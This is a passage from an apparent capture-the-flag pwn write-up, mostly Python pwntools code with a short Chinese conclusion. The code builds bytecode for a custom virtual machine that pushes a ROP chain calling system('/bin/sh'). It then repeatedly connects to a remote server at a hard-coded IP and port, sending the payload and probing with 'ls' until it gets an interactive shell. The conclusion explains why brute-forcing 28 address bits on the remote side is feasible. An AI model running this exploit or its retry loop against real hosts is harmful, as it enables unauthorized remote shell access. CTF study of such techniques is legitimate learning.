# pop_rdi + 1 skips the pop, leaving a bare ret that realigns the stack.
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, pop_rdi + 1)
bc += push_reg(2)
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, pop_rdi)
bc += push_reg(2)
# Argument for system(): address of the "/bin/sh" string inside libc.
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, next(so.search(b'/bin/sh')))
bc += push_reg(2)
bc += mov_reg_reg(2, 1)
bc += add_reg_imm(2, so.sym['system'])
bc += push_reg(2)

bc += halt()

# Retry until one attempt yields a shell. Each attempt opens a fresh
# connection, sends the bytecode, and probes the shell with `ls`.
while True:
    # `p` must stay a module-level name: the s/sl/itr aliases read it.
    p = None
    try:
        # p = remote('localhost', 20000)
        p = remote('123.57.66.184', 10083)
        s(bc)

        sl(b'ls')
        # recvuntil() returns b'' when the timeout expires, so only go
        # interactive when the marker was actually received.
        if p.recvuntil(b'pwn', timeout=110):
            itr()
            break
    except Exception as exc:
        # Connection failures and EOF mean this attempt missed; try again.
        # KeyboardInterrupt is not an Exception, so Ctrl-C still stops the loop.
        log.warning('attempt failed: %r' % (exc,))
    finally:
        # Always release the tube so failed attempts do not pile up sockets.
        if p is not None:
            p.close()

总结

做出这题的关键在于意识到扫描整个堆地址空间的可能性, 因为粗略计算一下需要爆破的28位(2^28 ≈ 2.7亿)大概是亿级水平, 以往的需要爆破的pwn都是本机发指令爆破, 而这里我们需要自己构造一个虚拟机来在远端直接爆破, 实际上自己写一个C程序验证一下, 循环一亿次的时间其实很短, 爆破的可能性是完全存在的.